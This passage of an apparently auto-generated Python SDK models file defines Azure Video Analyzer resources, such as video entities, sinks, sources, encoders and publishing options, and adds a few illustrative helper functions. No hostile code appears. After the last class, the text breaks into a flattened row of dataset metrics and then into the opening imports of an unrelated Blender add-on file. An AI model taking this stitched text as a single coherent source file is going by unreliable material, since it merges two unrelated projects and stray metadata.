:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'location': {'required': True},
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'tags': {'key': 'tags', 'type': '{str}'},
'location': {'key': 'location', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzer, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoAnalyzerCollection(msrest.serialization.Model):
"""A collection of VideoAnalyzer items.
:param value: A collection of VideoAnalyzer items.
:type value: list[~video_analyzer.models.VideoAnalyzer]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoAnalyzer]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class VideoAnalyzerIdentity(msrest.serialization.Model):
"""The managed identity for the Video Analyzer resource.
All required parameters must be populated in order to send to Azure.
:param type: Required. The identity type.
:type type: str
:param user_assigned_identities: The User Assigned Managed Identities.
:type user_assigned_identities: dict[str, ~video_analyzer.models.UserAssignedManagedIdentity]
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{UserAssignedManagedIdentity}'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerIdentity, self).__init__(**kwargs)
self.type = kwargs['type']
self.user_assigned_identities = kwargs.get('user_assigned_identities', None)
class VideoAnalyzerOperationStatus(msrest.serialization.Model):
"""Status of video analyzer operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerPrivateEndpointConnectionOperationStatus(msrest.serialization.Model):
"""Status of private endpoint connection operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. Operation identifier.
:type name: str
:param id: Operation resource ID.
:type id: str
:param start_time: Operation start time.
:type start_time: str
:param end_time: Operation end time.
:type end_time: str
:param status: Operation status.
:type status: str
:param error: The error detail.
:type error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'str'},
'end_time': {'key': 'endTime', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerPrivateEndpointConnectionOperationStatus, self).__init__(**kwargs)
self.name = kwargs['name']
self.id = kwargs.get('id', None)
self.start_time = kwargs.get('start_time', None)
self.end_time = kwargs.get('end_time', None)
self.status = kwargs.get('status', None)
self.error = kwargs.get('error', None)
class VideoAnalyzerUpdate(msrest.serialization.Model):
"""The update operation for a Video Analyzer account.
Variables are only populated by the server, and will be ignored when sending a request.
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: The identities associated to the Video Analyzer resource.
:type identity: ~video_analyzer.models.VideoAnalyzerIdentity
:param storage_accounts: The storage accounts for this resource.
:type storage_accounts: list[~video_analyzer.models.StorageAccount]
:ivar endpoints: The endpoints associated with this resource.
:vartype endpoints: list[~video_analyzer.models.Endpoint]
:param encryption: The account encryption properties.
:type encryption: ~video_analyzer.models.AccountEncryption
:param iot_hubs: The IoT Hubs for this resource.
:type iot_hubs: list[~video_analyzer.models.IotHub]
:param public_network_access: Whether or not public network access is allowed for resources
under the Video Analyzer account. Possible values include: "Enabled", "Disabled".
:type public_network_access: str or ~video_analyzer.models.PublicNetworkAccess
:param network_access_control: Network access control for Video Analyzer.
:type network_access_control: ~video_analyzer.models.NetworkAccessControl
:ivar provisioning_state: Provisioning state of the Video Analyzer account. Possible values
include: "Failed", "InProgress", "Succeeded".
:vartype provisioning_state: str or ~video_analyzer.models.ProvisioningState
:ivar private_endpoint_connections: Private Endpoint Connections created under Video Analyzer
account.
:vartype private_endpoint_connections: list[~video_analyzer.models.PrivateEndpointConnection]
"""
_validation = {
'endpoints': {'readonly': True},
'provisioning_state': {'readonly': True},
'private_endpoint_connections': {'readonly': True},
}
_attribute_map = {
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'VideoAnalyzerIdentity'},
'storage_accounts': {'key': 'properties.storageAccounts', 'type': '[StorageAccount]'},
'endpoints': {'key': 'properties.endpoints', 'type': '[Endpoint]'},
'encryption': {'key': 'properties.encryption', 'type': 'AccountEncryption'},
'iot_hubs': {'key': 'properties.iotHubs', 'type': '[IotHub]'},
'public_network_access': {'key': 'properties.publicNetworkAccess', 'type': 'str'},
'network_access_control': {'key': 'properties.networkAccessControl', 'type': 'NetworkAccessControl'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'private_endpoint_connections': {'key': 'properties.privateEndpointConnections', 'type': '[PrivateEndpointConnection]'},
}
def __init__(
self,
**kwargs
):
super(VideoAnalyzerUpdate, self).__init__(**kwargs)
self.tags = kwargs.get('tags', None)
self.identity = kwargs.get('identity', None)
self.storage_accounts = kwargs.get('storage_accounts', None)
self.endpoints = None
self.encryption = kwargs.get('encryption', None)
self.iot_hubs = kwargs.get('iot_hubs', None)
self.public_network_access = kwargs.get('public_network_access', None)
self.network_access_control = kwargs.get('network_access_control', None)
self.provisioning_state = None
self.private_endpoint_connections = None
class VideoArchival(msrest.serialization.Model):
"""Video archival properties.
    :param retention_period: Video retention period indicates the maximum age of the video archive
     segments which are intended to be kept in storage. It must be provided in ISO8601 duration
     format with a granularity of days, up to a maximum of 10 years. For example, if this is set
     to P30D (30 days), content older than 30 days will be periodically deleted. This value can be
     updated at any time and the new desired retention period will be effective within 24 hours.
:type retention_period: str
"""
_attribute_map = {
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoArchival, self).__init__(**kwargs)
self.retention_period = kwargs.get('retention_period', None)
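# Illustrative sketch: a 30-day retention policy expressed as an ISO8601
# duration, matching the P30D example in the docstring above.
def _example_video_archival():
    return VideoArchival(retention_period='P30D')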
class VideoContentToken(msrest.serialization.Model):
""""Video content token grants access to the video content URLs.".
Variables are only populated by the server, and will be ignored when sending a request.
:ivar expiration_date: The content token expiration date in ISO8601 format (eg.
2021-01-01T00:00:00Z).
:vartype expiration_date: ~datetime.datetime
:ivar token: The content token value to be added to the video content URL as the value for the
"token" query string parameter. The token is specific to a single video.
:vartype token: str
"""
_validation = {
'expiration_date': {'readonly': True},
'token': {'readonly': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
'token': {'key': 'token', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoContentToken, self).__init__(**kwargs)
self.expiration_date = None
self.token = None
class VideoContentUrls(msrest.serialization.Model):
"""Set of URLs to the video content.
:param download_url: Video file download URL. This URL can be used in conjunction with the
video content authorization token to download the video MP4 file. The resulting MP4 file can be
     played on any standard media player. It is available when the video type is 'file' and the
     video file is available for consumption.
:type download_url: str
:param archive_base_url: Video archive streaming base URL. The archived content can be
automatically played by the Azure Video Analyzer player widget. Alternatively, this URL can be
used in conjunction with the video content authorization token on any compatible DASH or HLS
     player by appending the following to the base URL:
.. code-block::
- HLSv4: /manifest(format=m3u8-aapl).m3u8
- HLS CMAF: /manifest(format=m3u8-cmaf)
- DASH CMAF: /manifest(format=mpd-time-cmaf)
     Moreover, an ongoing video recording can be played in "live mode" with latencies that are
     approximately double the chosen video segment length. It is available when the video type is
     'archive' and video archiving is enabled.
:type archive_base_url: str
:param rtsp_tunnel_url: Video low-latency streaming URL. The live content can be automatically
played by the Azure Video Analyzer player widget. Alternatively, this URL can be used in
conjunction with the video content authorization token to expose a WebSocket tunneled RTSP
stream. It is available when the video type is 'archive' and a live, low-latency feed is
available from the source.
:type rtsp_tunnel_url: str
:param preview_image_urls: Video preview image URLs. These URLs can be used in conjunction with
the video content authorization token to download the most recent still image from the video
archive in different resolutions. They are available when the video type is 'archive' and
preview images are enabled.
:type preview_image_urls: ~video_analyzer.models.VideoPreviewImageUrls
"""
_attribute_map = {
'download_url': {'key': 'downloadUrl', 'type': 'str'},
'archive_base_url': {'key': 'archiveBaseUrl', 'type': 'str'},
'rtsp_tunnel_url': {'key': 'rtspTunnelUrl', 'type': 'str'},
'preview_image_urls': {'key': 'previewImageUrls', 'type': 'VideoPreviewImageUrls'},
}
def __init__(
self,
**kwargs
):
super(VideoContentUrls, self).__init__(**kwargs)
self.download_url = kwargs.get('download_url', None)
self.archive_base_url = kwargs.get('archive_base_url', None)
self.rtsp_tunnel_url = kwargs.get('rtsp_tunnel_url', None)
self.preview_image_urls = kwargs.get('preview_image_urls', None)
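# Illustrative sketch (hypothetical helper): composing a playable HLS URL from
# the archive base URL and a content token, following the manifest suffixes
# documented on VideoContentUrls and the "token" query parameter documented on
# VideoContentToken.
def _example_hls_url(content_urls, token):
    # HLSv4 manifest; the CMAF variants use m3u8-cmaf / mpd-time-cmaf instead.
    return '{0}/manifest(format=m3u8-aapl).m3u8?token={1}'.format(
        content_urls.archive_base_url, token)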
class VideoCreationProperties(msrest.serialization.Model):
"""Optional properties to be used in case a new video resource needs to be created on the service. These will not take effect if the video already exists.
:param title: Optional title provided by the user. Value can be up to 256 characters long.
:type title: str
:param description: Optional description provided by the user. Value can be up to 2048
characters long.
:type description: str
    :param segment_length: Segment length indicates the length of individual content files
     (segments) which are persisted to storage. Smaller segments provide lower archive playback
     latency but generate a larger volume of storage transactions. Larger segments reduce the
     amount of storage transactions while increasing the archive playback latency. Value must be
     specified in ISO8601 duration format (e.g. "PT30S" for 30 seconds) and can range from 30
     seconds to 5 minutes, in 30-second increments. Changing this value after the initial call to
     create the video resource can lead to errors when uploading content to the archive. Default
     value is 30 seconds. This property is only allowed for topologies where "kind" is set to
     "live".
:type segment_length: str
    :param retention_period: Video retention period indicates how long the video is kept in
     storage. Value must be specified in ISO8601 duration format (e.g. "P1D" for 1 day) and can
     range from 1 day to 10 years, in 1-day increments. When absent (null), all video content is
     retained indefinitely. This property is only allowed for topologies where "kind" is set to
     "live".
:type retention_period: str
"""
_attribute_map = {
'title': {'key': 'title', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'segment_length': {'key': 'segmentLength', 'type': 'str'},
'retention_period': {'key': 'retentionPeriod', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoCreationProperties, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.segment_length = kwargs.get('segment_length', None)
self.retention_period = kwargs.get('retention_period', None)
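# Illustrative sketch (hypothetical values): creation properties for a live
# video with 30-second segments retained for 30 days, using the ISO8601
# duration strings described in the docstring above.
def _example_video_creation_properties():
    return VideoCreationProperties(
        title='Parking lot camera',
        segment_length='PT30S',   # 30-second segments (the default)
        retention_period='P30D',  # keep content for 30 days
    )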
class VideoEncoderBase(msrest.serialization.Model):
"""Base type for all video encoding presets, which define the recipe or instructions on how the input video should be processed.
You probably want to use the sub-classes and not this class directly. Known
sub-classes are: VideoEncoderH264.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
    :param bitrate_kbps: The maximum bitrate, in kilobits per second (Kbps), at which video should
     be encoded. If omitted, the encoder sets it automatically to try to match the quality of the
     input video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
_subtype_map = {
'type': {'#Microsoft.VideoAnalyzer.VideoEncoderH264': 'VideoEncoderH264'}
}
def __init__(
self,
**kwargs
):
super(VideoEncoderBase, self).__init__(**kwargs)
self.type = None # type: Optional[str]
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.frame_rate = kwargs.get('frame_rate', None)
self.scale = kwargs.get('scale', None)
class VideoEncoderH264(VideoEncoderBase):
"""A custom preset for encoding video with the H.264 (AVC) codec.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
    :param bitrate_kbps: The maximum bitrate, in kilobits per second (Kbps), at which video should
     be encoded. If omitted, the encoder sets it automatically to try to match the quality of the
     input video.
:type bitrate_kbps: str
:param frame_rate: The frame rate (in frames per second) of the encoded video. The value must
be greater than zero, and less than or equal to 300. If omitted, the encoder uses the average
frame rate of the input video.
:type frame_rate: str
:param scale: Describes the resolution of the encoded video. If omitted, the encoder uses the
resolution of the input video.
:type scale: ~video_analyzer.models.VideoScale
"""
_validation = {
'type': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'bitrate_kbps': {'key': 'bitrateKbps', 'type': 'str'},
'frame_rate': {'key': 'frameRate', 'type': 'str'},
'scale': {'key': 'scale', 'type': 'VideoScale'},
}
def __init__(
self,
**kwargs
):
super(VideoEncoderH264, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoEncoderH264' # type: str
class VideoEntity(ProxyResource):
"""Represents a video resource within Azure Video Analyzer. Videos can be ingested from RTSP cameras through live pipelines or can be created by exporting sequences from existing captured video through a pipeline job. Videos ingested through live pipelines can be streamed through Azure Video Analyzer Player Widget or compatible players. Exported videos can be downloaded as MP4 files.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param title: Optional video title provided by the user. Value can be up to 256 characters
long.
:type title: str
:param description: Optional video description provided by the user. Value can be up to 2048
characters long.
:type description: str
:ivar type_properties_type: Video content type. Different content types are suitable for
different applications and scenarios. Possible values include: "Archive", "File".
:vartype type_properties_type: str or ~video_analyzer.models.VideoType
:ivar flags: Video flags contain information about the available video actions and its dynamic
properties based on the current video state.
:vartype flags: ~video_analyzer.models.VideoFlags
:ivar content_urls: Set of URLs to the video content.
:vartype content_urls: ~video_analyzer.models.VideoContentUrls
:param media_info: Contains information about the video and audio content.
:type media_info: ~video_analyzer.models.VideoMediaInfo
:param archival: Video archival properties.
:type archival: ~video_analyzer.models.VideoArchival
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'type_properties_type': {'readonly': True},
'flags': {'readonly': True},
'content_urls': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'title': {'key': 'properties.title', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'type_properties_type': {'key': 'properties.type', 'type': 'str'},
'flags': {'key': 'properties.flags', 'type': 'VideoFlags'},
'content_urls': {'key': 'properties.contentUrls', 'type': 'VideoContentUrls'},
'media_info': {'key': 'properties.mediaInfo', 'type': 'VideoMediaInfo'},
'archival': {'key': 'properties.archival', 'type': 'VideoArchival'},
}
def __init__(
self,
**kwargs
):
super(VideoEntity, self).__init__(**kwargs)
self.title = kwargs.get('title', None)
self.description = kwargs.get('description', None)
self.type_properties_type = None
self.flags = None
self.content_urls = None
self.media_info = kwargs.get('media_info', None)
self.archival = kwargs.get('archival', None)
class VideoEntityCollection(msrest.serialization.Model):
"""A collection of VideoEntity items.
:param value: A collection of VideoEntity items.
:type value: list[~video_analyzer.models.VideoEntity]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[VideoEntity]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoEntityCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class VideoFlags(msrest.serialization.Model):
"""Video flags contain information about the available video actions and its dynamic properties based on the current video state.
All required parameters must be populated in order to send to Azure.
:param can_stream: Required. Value indicating whether or not the video can be streamed. Only
"archive" type videos can be streamed.
:type can_stream: bool
:param has_data: Required. Value indicating whether or not there has ever been data recorded or
uploaded into the video. Newly created videos have this value set to false.
:type has_data: bool
    :param is_in_use: Required. Value indicating whether or not the video is currently being
     referenced by an active pipeline. The fact that it is being referenced doesn't necessarily
     indicate that data is being received. For example, video recording may be gated on events, or
     the camera may not be accessible at the time.
:type is_in_use: bool
"""
_validation = {
'can_stream': {'required': True},
'has_data': {'required': True},
'is_in_use': {'required': True},
}
_attribute_map = {
'can_stream': {'key': 'canStream', 'type': 'bool'},
'has_data': {'key': 'hasData', 'type': 'bool'},
'is_in_use': {'key': 'isInUse', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(VideoFlags, self).__init__(**kwargs)
self.can_stream = kwargs['can_stream']
self.has_data = kwargs['has_data']
self.is_in_use = kwargs['is_in_use']
class VideoMediaInfo(msrest.serialization.Model):
"""Contains information about the video and audio content.
    :param segment_length: Video segment length indicates the length of individual video files
     (segments) which are persisted to storage. Smaller segments provide lower archive playback
     latency but generate a larger volume of storage transactions. Larger segments reduce the
     amount of storage transactions while increasing the archive playback latency. Value must be
     specified in ISO8601 duration format (e.g. "PT30S" for 30 seconds) and can range from 30
     seconds to 5 minutes, in 30-second increments.
:type segment_length: str
"""
_attribute_map = {
'segment_length': {'key': 'segmentLength', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoMediaInfo, self).__init__(**kwargs)
self.segment_length = kwargs.get('segment_length', None)
class VideoPreviewImageUrls(msrest.serialization.Model):
"""Video preview image URLs. These URLs can be used in conjunction with the video content authorization token to download the most recent still image from the video archive in different resolutions. They are available when the video type is 'archive' and preview images are enabled.
:param small: Low resolution preview image URL.
:type small: str
:param medium: Medium resolution preview image URL.
:type medium: str
:param large: High resolution preview image URL.
:type large: str
"""
_attribute_map = {
'small': {'key': 'small', 'type': 'str'},
'medium': {'key': 'medium', 'type': 'str'},
'large': {'key': 'large', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPreviewImageUrls, self).__init__(**kwargs)
self.small = kwargs.get('small', None)
self.medium = kwargs.get('medium', None)
self.large = kwargs.get('large', None)
class VideoPublishingOptions(msrest.serialization.Model):
"""Optional flags used to change how video is published. These are only allowed for topologies where "kind" is set to "live".
    :param disable_archive: When set to 'true', content will not be archived or recorded. This is
     used, for example, when the topology is used only for low-latency video streaming. Default is
     'false'. If set to 'true', then "disableRtspPublishing" must be set to 'false'.
    :type disable_archive: str
    :param disable_rtsp_publishing: When set to 'true', the RTSP playback URL will not be
     published, disabling low-latency streaming. This is used, for example, when the topology is
     used only for archiving content. Default is 'false'. If set to 'true', then "disableArchive"
     must be set to 'false'.
    :type disable_rtsp_publishing: str
"""
_attribute_map = {
'disable_archive': {'key': 'disableArchive', 'type': 'str'},
'disable_rtsp_publishing': {'key': 'disableRtspPublishing', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoPublishingOptions, self).__init__(**kwargs)
self.disable_archive = kwargs.get('disable_archive', None)
self.disable_rtsp_publishing = kwargs.get('disable_rtsp_publishing', None)
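# Illustrative sketch: publishing options for a low-latency-only topology.
# Note the documented constraint that disableArchive and disableRtspPublishing
# cannot both be 'true'.
def _example_publishing_options():
    return VideoPublishingOptions(
        disable_archive='true',           # stream only, keep nothing in storage
        disable_rtsp_publishing='false',  # must stay 'false' when archiving is disabled
    )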
class VideoScale(msrest.serialization.Model):
"""The video scaling information.
:param height: The desired output video height.
:type height: str
:param width: The desired output video width.
:type width: str
:param mode: Describes the video scaling mode to be applied. Default mode is 'Pad'. If the mode
is 'Pad' or 'Stretch' then both width and height must be specified. Else if the mode is
'PreserveAspectRatio' then only one of width or height need be provided. Possible values
include: "Pad", "PreserveAspectRatio", "Stretch".
:type mode: str or ~video_analyzer.models.VideoScaleMode
"""
_attribute_map = {
'height': {'key': 'height', 'type': 'str'},
'width': {'key': 'width', 'type': 'str'},
'mode': {'key': 'mode', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoScale, self).__init__(**kwargs)
self.height = kwargs.get('height', None)
self.width = kwargs.get('width', None)
self.mode = kwargs.get('mode', None)
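# Illustrative sketch (hypothetical values): the two ways a VideoScale is
# typically populated, per the mode semantics documented above.
def _example_video_scales():
    # 'Pad' and 'Stretch' require both dimensions.
    padded = VideoScale(height='720', width='1280', mode='Pad')
    # 'PreserveAspectRatio' needs only one dimension.
    fitted = VideoScale(height='720', mode='PreserveAspectRatio')
    return padded, fitted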
class VideoSequenceAbsoluteTimeMarkers(TimeSequenceBase):
"""A sequence of absolute datetime ranges as a string. The datetime values should follow IS08601, and the sum of the ranges should add up to 24 hours or less. Currently, there can be only one range specified in the sequence.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param ranges: Required. The sequence of datetime ranges. Example: '[["2021-10-05T03:30:00Z",
"2021-10-05T03:40:00Z"]]'.
:type ranges: str
"""
_validation = {
'type': {'required': True},
'ranges': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'ranges': {'key': 'ranges', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(VideoSequenceAbsoluteTimeMarkers, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSequenceAbsoluteTimeMarkers' # type: str
self.ranges = kwargs['ranges']
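# Illustrative sketch: the 'ranges' property is a JSON-encoded list of
# [start, end] pairs serialized as a string, so json.dumps produces the
# documented format (times below are hypothetical).
def _example_time_markers():
    import json
    ranges = [["2021-10-05T03:30:00Z", "2021-10-05T03:40:00Z"]]
    return VideoSequenceAbsoluteTimeMarkers(ranges=json.dumps(ranges))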
class VideoSink(SinkNodeBase):
"""Video sink in a live topology allows for video and audio to be captured, optionally archived, and published via a video resource. If archiving is enabled, this results in a video of type 'archive'. If used in a batch topology, this allows for video and audio to be stored as a file, and published via a video resource of type 'file'.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param inputs: Required. An array of upstream node references within the topology to be used as
inputs for this node.
:type inputs: list[~video_analyzer.models.NodeInput]
    :param video_name: Required. Name of a new or existing video resource used to capture and
     publish content. Note: if this node is downstream of an RTSP source and "disableArchive" is
     set to 'true', then no content is archived.
:type video_name: str
:param video_creation_properties: Optional video properties to be used in case a new video
resource needs to be created on the service.
:type video_creation_properties: ~video_analyzer.models.VideoCreationProperties
:param video_publishing_options: Options to change how the video sink publishes content via the
video resource. This property is only allowed for topologies where "kind" is set to "live".
:type video_publishing_options: ~video_analyzer.models.VideoPublishingOptions
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'inputs': {'required': True},
'video_name': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'inputs': {'key': 'inputs', 'type': '[NodeInput]'},
'video_name': {'key': 'videoName', 'type': 'str'},
'video_creation_properties': {'key': 'videoCreationProperties', 'type': 'VideoCreationProperties'},
'video_publishing_options': {'key': 'videoPublishingOptions', 'type': 'VideoPublishingOptions'},
}
def __init__(
self,
**kwargs
):
super(VideoSink, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSink' # type: str
self.video_name = kwargs['video_name']
self.video_creation_properties = kwargs.get('video_creation_properties', None)
self.video_publishing_options = kwargs.get('video_publishing_options', None)
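# Illustrative sketch (hypothetical names): a complete video sink wired to an
# upstream node, combining the creation and publishing helpers above. This
# assumes the kwargs-style NodeInput constructor defined earlier in this
# module.
def _example_video_sink():
    return VideoSink(
        name='videoSink',
        inputs=[NodeInput(node_name='rtspSource')],
        video_name='sample-video',
        video_creation_properties=_example_video_creation_properties(),
        video_publishing_options=_example_publishing_options(),
    )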
class VideoSource(SourceNodeBase):
"""Video source allows for content from a Video Analyzer video resource to be ingested into a pipeline. Currently supported only with batch pipelines.
All required parameters must be populated in order to send to Azure.
    :param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param name: Required. Node name. Must be unique within the topology.
:type name: str
:param video_name: Required. Name of the Video Analyzer video resource to be used as the
source.
:type video_name: str
:param time_sequences: Required. Describes a sequence of datetime ranges. The video source only
picks up recorded media within these ranges.
:type time_sequences: ~video_analyzer.models.TimeSequenceBase
"""
_validation = {
'type': {'required': True},
'name': {'required': True},
'video_name': {'required': True},
'time_sequences': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'video_name': {'key': 'videoName', 'type': 'str'},
'time_sequences': {'key': 'timeSequences', 'type': 'TimeSequenceBase'},
}
def __init__(
self,
**kwargs
):
super(VideoSource, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.VideoSource' # type: str
self.video_name = kwargs['video_name']
self.time_sequences = kwargs['time_sequences']
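# Illustrative sketch (hypothetical names): a batch-pipeline video source that
# reads one recorded range, using the time-marker helper above.
def _example_video_source():
    return VideoSource(
        name='videoSource',
        video_name='sample-video',
        time_sequences=_example_time_markers(),
    )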
| [per-file metric and quality-signal columns for the preceding record, flattened one value per line in the source: avg_line_length 38.473447, max_line_length 815, alphanum_fraction 0.658563; the remaining signal values are mostly 0 or null and are elided here]
| [next record] commit 4c4fedd0e6fc912cf1a282846b6e90c655a094c7 | 69,123 bytes | py / Python | file: blender/arm/material/cycles.py | repo: philipmduarte/armory @ 675211c66a1e49147226ccb472a6f5dc87b7db02 | licenses: ["Zlib"] | 1 star (2021-03-17T05:51:45.000Z); issue and fork fields: null | content:
#
# This module builds upon Cycles nodes work licensed as
# Copyright 2011-2013 Blender Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import bpy
import os
import arm.assets
import arm.utils
import arm.make_state
import arm.log
import arm.material.mat_state as mat_state
import arm.material.cycles_functions as c_functions
import shutil
emission_found = False
particle_info = None # Particle info export
